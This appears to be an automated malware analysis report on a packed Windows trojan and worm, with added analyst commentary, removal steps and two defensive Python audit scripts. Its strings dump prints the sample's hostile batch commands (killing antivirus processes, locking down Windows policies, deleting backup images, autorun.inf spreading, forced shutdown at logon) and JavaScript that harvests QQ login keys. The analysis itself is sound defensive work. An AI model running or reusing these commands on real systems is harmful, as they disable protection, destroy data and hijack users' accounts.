HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.B6FAF71C (B) (Emsisoft), Generic.Malware.SFMDYBVd.B6FAF71C (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0a9ae60a1507dc9b0141dcb01ee413f6
SHA1: 296c491c9a00b5c9f4e825b6e2e3ecb2994cb742
SHA256: 8ce272c3e085a9f8da14abc2f56747ec9e50b771a2471e8c5e80cc664ec2e092
SSDeep: 6144:Zq9Eypeh23JV66dr1pVOWliICbpJouNjbb1FSEBqVg88GqgQxY8oEpeb:Q9N3JV6kr1cVOWdCLFfXf88GqgQxgEp
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPX ("Compresor Gratuito", www.upx.sourceforge.net), UPolyX v0.5
Company: AirInstaller
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails (the strings dump contains SMTP header templates: From:, To:, Cc:, Reply-To:, Subject:, Date:, plus an RFC 822 date format string). |
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1808
The only "injection" target is the sample's own process. Together with the UPX packer verdict, the UPX0 section with a raw size of 0, and the rwx dump region at 0x00401000 (the start of UPX0) listed under Strings from Dumps, this is consistent with the packer writing the decompressed image into its own address space; no other process was touched during the run.
File activity
The process %original file name%.exe:1808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\slear.exe (1425 bytes)
At 1425 bytes, and with no dropped PE file recorded below, slear.exe is neither a copy of the 304640-byte sample nor a PE image at all. Its size is consistent with the batch-script payload (c:\slear.bat, copy %0 ..., reg add ...) visible in the strings dump, written under an .exe name; the Run entry below points at it.
Registry activity
The process %original file name%.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A AD 27 89 AD 3E 4B 95 FA C7 91 0A 48 3B 37 B5"
The RNG\Seed value is rewritten by CryptoAPI whenever any process draws random bytes; it changes on every run and is not an indicator for this sample.
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. In this sample the autorun.inf is produced by the embedded batch script rather than by the PE directly: the fragments in the strings dump write a [AutoRun] section with Open=setup.bat and Open=system.bat to d:\, write [AuroRun] / Open=system.bat to every letter in a %drive% list, drop a system.bat next to each copy, and set the read-only, system and hidden attributes on both files (attrib +r +s +h) so that Explorer hides them under default settings. The loops are not limited to removable media; fixed and network drive letters receive the same files. The misspelled [AuroRun] header is not read by Windows, so those copies never fire automatically; only a correctly spelled [AutoRun] section such as the one written to d:\ would. Whether an Open= line runs at all depends on the victim's AutoRun configuration: the Windows XP SP3 analysis platform honours it unless the 2011 AutoRun update (KB971029) or a NoDriveTypeAutoRun policy is applied, and Windows 7 and later ignore autorun.inf on non-optical removable media.
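As an added example (not part of the Lavasoft report), a small Python triage routine for autorun.inf files of the kind this dropper writes. The sample contents are constructed from the batch lines in the strings dump, including the misspelled [AuroRun] variant; the section-name rule (Windows reads only [autorun] and [autorun.<arch>], case-insensitively) and the set of keys treated as executing something are assumptions drawn from the autorun.inf format, not from the report.

```python
"""Triage of autorun.inf files of the kind this dropper writes to every drive.

Added example, not part of the Lavasoft report. Sample contents are constructed
from the batch lines in the strings dump ([AutoRun] / Open=setup.bat /
Open=system.bat, and the misspelled [AuroRun] header).
"""
import os
import re
from dataclasses import dataclass

# Keys that make Windows launch something; icon=, label= and friends are cosmetic.
# (Assumption taken from the autorun.inf format, not from the report.)
EXEC_KEYS = {"open", "shellexecute"}
SHELL_COMMAND = re.compile(r"^shell\\[^\\]+\\command$")


@dataclass
class Finding:
    section: str
    key: str
    target: str
    honored: bool   # False: Windows never reads this section, so it cannot fire


def parse_autorun(text):
    """Return (section, key, value) triples in file order.

    Duplicate keys are kept on purpose: the worm writes two Open= lines, and a
    triage tool should show both rather than silently drop one.
    """
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            entries.append((section, key.strip(), value.strip()))
    return entries


def triage_autorun(text):
    """Flag every entry that would launch a program and record whether Windows
    reads the section it sits in ([autorun] or [autorun.<arch>], any case)."""
    findings = []
    for section, key, value in parse_autorun(text):
        s, k = section.lower(), key.lower()
        if k in EXEC_KEYS or SHELL_COMMAND.match(k):
            honored = s == "autorun" or s.startswith("autorun.")
            findings.append(Finding(section, key, value, honored))
    return findings


def triage_drive_root(root):
    """Read <root>/autorun.inf if present (the +r +s +h attributes the dropper
    sets do not stop a direct open) and return its findings, [] when absent."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return []
    with open(path, "r", encoding="cp1252", errors="replace") as fh:
        return triage_autorun(fh.read())


# Constructed samples mirroring the dropper's echo lines.
WORM_INF = "[AutoRun]\r\nOpen=setup.bat\r\nOpen=system.bat\r\n"
TYPO_INF = "[AuroRun]\r\nOpen=system.bat\r\n"
CD_INF = "[autorun]\r\nicon=setup.exe,0\r\nlabel=Install disc\r\n"

if __name__ == "__main__":
    for name, inf in (("worm", WORM_INF), ("typo", TYPO_INF), ("cd", CD_INF)):
        for f in triage_autorun(inf):
            state = "fires" if f.honored else "dead section"
            print(f"{name}: [{f.section}] {f.key}={f.target} ({state})")
```

Run triage_drive_root() against the root of each mounted drive or image. A drive that still carries a readable [AutoRun] Open= line should be treated as infected even when the examining machine has AutoRun disabled, because the next XP host it is plugged into may not have KB971029 applied.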
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal
- Terminate malicious process(es) (How to End a Process With the Task Manager): no processes were created in the analysis, so there is nothing to terminate.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\slear.exe (1425 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
The steps above cover only what the sandbox run recorded. The batch fragments in the strings dump below describe further changes that a fully executed infection may have made, several of which would block the manual steps themselves: Task Manager, regedit and cmd.exe disabled (Policies\System\DisableTaskMgr and DisableRegistryTools, Policies\Microsoft\Windows\System\DisableCMD); .exe, .bat, .cmd, .reg, .vbs, .com and .txt re-associated to nullfile (assoc ... =nullfile); Explorer restrictions (NoRun, NoDrives, NoFolderOptions, NoDesktop, NoClose, NoFind, NoLogOff, NoControlPanel, RestrictRun and others); System Restore disabled (DisableSR, DisableConfig); and *.gho images deleted from every drive. Revert those policies first, from a clean boot medium if the console is locked, then also check: Run/RunOnce values named setup.bat, AUTOEXEC.BAT, explorer.bat and reboot_system (the last one runs shutdown -s -t 0 at every logon); HKCR\batfile\shell\open\command; the run= and load= lines in win.ini and the shell= line in system.ini; C:\AUTOEXEC.BAT; and the hidden system files %windir%\system32\cmd.bat, %windir%\system32\explorer.bat, %systemroot%\windows.bat, d:\setup.bat, d:\Program Files\run.bat and <drive>:\system.bat, together with autorun.inf on every drive letter, not only removable ones.
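To check a machine against the persistence and lockdown points above without trusting a console that the dropper may have disabled, an added Python audit (not the report's or Ad-Aware's code) that parses a regedit / `reg export` .reg file and flags the artefacts this sample is known to set. The .reg text embedded below is constructed for the example; the policy and Run value names are taken from the REG ADD commands in the strings dump, and the heuristic that any Run/RunOnce value pointing at a .bat or .cmd is suspicious is an assumption of the example.

```python
"""Audit a .reg export for the persistence and lockdown artefacts of this sample.

Added example, not code from the Lavasoft report or from Ad-Aware. It parses
the text format written by regedit / `reg export` and flags registry state
matching the REG ADD commands in the strings dump. SAMPLE_REG is constructed.
"""
import re
from dataclasses import dataclass

_VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def _unescape(s):
    # .reg strings escape backslash and double quote with a backslash
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg(text):
    """Return {key_path_lower: {value_name_lower: (type, data)}}.

    REG_SZ ("...") and REG_DWORD (dword:hex) are decoded; other types are kept
    as raw text. Names are lower-cased because the registry is case-insensitive.
    The default value is stored under the name "@".
    """
    joined = re.sub(r"\\\r?\n\s*", "", text)          # join hex(...) continuation lines
    tree, key = {}, None
    for raw in joined.splitlines():
        line = raw.strip()
        if not line or line[0] == ";" or line.startswith("Windows Registry Editor"):
            continue
        if line[0] == "[" and line[-1] == "]":
            key = line[1:-1].lower()
            tree.setdefault(key, {})
            continue
        m = _VALUE_LINE.match(line)
        if not m or key is None:
            continue
        name = "@" if m.group(2) else _unescape(m.group(1)).lower()
        data = m.group(3).strip()
        if len(data) >= 2 and data[0] == data[-1] == '"':
            tree[key][name] = ("REG_SZ", _unescape(data[1:-1]))
        elif data.lower().startswith("dword:"):
            tree[key][name] = ("REG_DWORD", int(data[6:], 16))
        else:
            tree[key][name] = ("RAW", data)
    return tree


@dataclass
class Finding:
    key: str
    name: str
    data: object
    why: str


RUN_KEYS = [r"hkey_current_user\software\microsoft\windows\currentversion\run",
            r"hkey_local_machine\software\microsoft\windows\currentversion\run",
            r"hkey_local_machine\software\microsoft\windows\currentversion\runonce"]
# value names the sample registers: the Run entry from the dynamic analysis plus
# the REG ADD ... /v names in the batch fragments
KNOWN_RUN_NAMES = {"slear.exe", "setup.bat", "autoexec.bat", "explorer.bat", "reboot_system"}
# policy values the batch sets to 1 (key -> value names, from the strings dump)
LOCKDOWN = {
    r"hkey_current_user\software\microsoft\windows\currentversion\policies\system":
        {"disabletaskmgr", "disableregistrytools"},
    r"hkey_current_user\software\microsoft\windows\currentversion\policies\explorer":
        {"norun", "nodrives", "nofolderoptions", "nodesktop", "noclose", "nofind", "nologoff",
         "nosettaskbar", "nonethood", "norecentdocsmenu", "restrictrun", "nocontrolpanel",
         "noviewcontextmenu", "nosetfolders", "nofilemenu"},
    r"hkey_local_machine\software\microsoft\windows nt\currentversion\systemrestore": {"disablesr"},
    r"hkey_local_machine\software\policies\microsoft\windows nt\systemrestore": {"disableconfig"},
    r"hkey_current_user\software\policies\microsoft\windows\system": {"disablecmd"},
}
_BATCH_TARGET = re.compile(r"\.(?:bat|cmd)\b", re.IGNORECASE)


def audit_reg(text):
    """Return the Findings for one .reg export."""
    tree, out = parse_reg(text), []
    for key in RUN_KEYS:
        for name, (_, data) in tree.get(key, {}).items():
            if name in KNOWN_RUN_NAMES:
                out.append(Finding(key, name, data, "Run value name used by this sample"))
            elif isinstance(data, str) and _BATCH_TARGET.search(data):
                # assumption of this example: autostarting a .bat/.cmd is suspicious
                out.append(Finding(key, name, data, "Run value launches a batch file"))
    for key, names in LOCKDOWN.items():
        for name, (_, data) in tree.get(key, {}).items():
            if name in names and data not in (0, "0"):
                out.append(Finding(key, name, data, "lockdown policy set by the dropper"))
    exe = tree.get(r"hkey_classes_root\.exe", {}).get("@", (None, ""))[1]
    if exe and exe.lower() != "exefile":
        out.append(Finding(r"hkey_classes_root\.exe", "@", exe, ".exe no longer maps to exefile (assoc .exe=nullfile)"))
    bat = tree.get(r"hkey_classes_root\batfile\shell\open\command", {}).get("@", (None, ""))[1]
    if bat and "%1" not in bat:
        out.append(Finding(r"hkey_classes_root\batfile\shell\open\command", "@", bat, "batfile open verb hijacked"))
    return out


SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe"="c:\\windows\\system32\\slear.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"updater"="d:\\setup.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000

[HKEY_CLASSES_ROOT\.exe]
@="nullfile"

[HKEY_CLASSES_ROOT\batfile\shell\open\command]
@="\"%1\" %*"
'''

if __name__ == "__main__":
    for f in audit_reg(SAMPLE_REG):
        print(f"[{f.key}] {f.name} = {f.data!r}: {f.why}")
```

Export the relevant hives from a clean environment (offline hive mounted under a clean Windows, or `reg export` run from a recovery console) and feed the files to audit_reg(); each Finding names the exact key and value to delete or reset, so the fix can be applied before the locked-down console is needed.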
Static Analysis
VersionInfo
Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
The runs of "?" are characters outside the code page of the extraction and cannot be recovered. The eyuyan.com reference, the E.App name in the embedded manifest and the Trojan.Win32.FlyStudio detection all point to the Chinese "E language" (易语言, EPL) toolchain, whose compiled binaries are commonly labelled FlyStudio by antivirus vendors.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 651264 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 655360 | 290816 | 287232 | 5.49421 | 5f1aeacec80e299b97a3c0be6a619a2c |
.rsrc | 946176 | 16384 | 16384 | 2.49987 | e2784112b04c223b0d25494fb365f9a9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
caf03e9cc3118627cd7c3d133a311224
Network Activity
URLs
(none recorded)
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
(none recorded)
Traffic
The Trojan connects to the servers at the following location(s):
(none recorded)
No traffic was captured in this run. The strings dump nonetheless contains WinInet imports (HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA), an Internet Explorer 9 user-agent string, the QQ/Qzone endpoints ptlogin2.qq.com, xui.ptlogin2.qq.com, qzs.qq.com, taotao.qq.com and w.qzone.qq.com, and the hosts www.shafou.com, adm-music.com and www.dywt.com.cn, so the silence reflects this particular run rather than an absence of network capability. Treat those hosts as candidate indicators, not confirmed command-and-control.
Strings from Dumps
The dumps below say more than the sandbox run, which recorded only the slear.exe drop and the Run entry. Three groups of strings stand out. The QQ/Qzone group (SSOAxCtrlForPTLogin.SSOForPTLogin2, the PTALIST array in the JavaScript fragment, ptlogin2.qq.com/jump?clientuin= with &clientkey=, skey=, emotion_cgi_publish_v6?g_tk=, cgi_apply_updateuserinfo_new?g_tk=, a copy of the Qzone client's g_tk hash loop and an MSIE 9.0 user-agent) indicates that the sample reads the logged-in user's uin and clientkey from the QQ client's single-sign-on ActiveX control, redeems them for web session cookies, and then publishes status updates and changes the nickname and space name over WinInet in the user's name. The batch-script group (copy %0 %windir%\system32\cmd.bat, taskkill-style "%s% /im <process> /f" lines aimed at security products, qq.exe and explorer.exe, a long series of REG ADD ... Policies\Explorer and Policies\System commands, assoc .exe=nullfile, del %%c:\*.gho, win.ini/system.ini/AUTOEXEC.BAT edits and [AutoRun]/Open= lines written to every drive) is the dropper that locks the machine down and spreads via autorun.inf. The SMTP header templates (From:, To:, Subject:, Date:, "%a, %d %b %Y %H:%M:%S") support the EmailWorm verdict, the SetWindowsHookExA/keybd_event imports show keyboard hooking and synthetic-keystroke capability, and the SafeBoot\Network subkey names next to a RegDeleteKeyA import are consistent with tampering with Safe Mode with Networking. None of the network capability was exercised in the sandbox (see Network Activity above).
%original file name%.exe_1808:
`.rsrc
t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
http://
len = str.length; i < len; ++i) hash += (hash << 5) + str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a = (a.indexOf("?") > -1 ? "&": "?") + "g_tk=" + QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
http://www.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf +r +s +h >>d:\setup.bat
attrib d:\setup.bat +r +s +h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h%
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat +r +s +h >nul
http://www.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
